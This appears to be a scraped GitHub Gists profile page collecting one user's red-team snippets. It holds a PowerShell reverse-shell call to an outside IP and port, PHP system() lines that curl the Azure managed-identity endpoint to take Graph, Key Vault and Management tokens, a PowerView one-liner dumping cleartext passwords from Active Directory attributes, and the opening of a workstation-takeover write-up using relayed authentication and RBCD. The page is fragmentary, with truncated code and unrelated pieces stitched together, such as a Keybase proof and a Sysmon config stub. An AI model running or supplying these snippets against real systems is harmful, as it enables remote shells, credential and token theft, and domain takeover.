Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
echo "[*] Creating temporary directory..."
TMPDIR="$(mktemp -d --suffix=_bloodhound-customqueries)"
# Compass BloodHound Customqueries
iex (New-Object
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
C0axx / Get-GraphToken.php
Created January 3, 2023 18:16
Request access tokens for Azure Graph services
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-VaultToken.php
Last active January 3, 2023 18:28
Request Azure Keyvault Token
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-ManagementToken.php
Last active January 3, 2023 18:16
Request access tokens for Azure Management services
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
C0axx /
Created September 25, 2022 00:17 — forked from mgeeky/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Keybase proof

I hereby claim:

  • I am c0axx on github.
  • I am c0axx ( on keybase.
  • I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao

To claim this, I am signing this object:

<Sysmon schemaversion="4.50">
<!-- This now also determines the file names of the files preserved (String) -->
<CheckRevocation />
<!-- Disables lookup behavior, default is True (Boolean) -->
<!-- Sets the name of the directory in the C:\ root where preserved files will be saved (String)-->
<CaptureClipboard />
<!--This enables capturing the Clipboard changes-->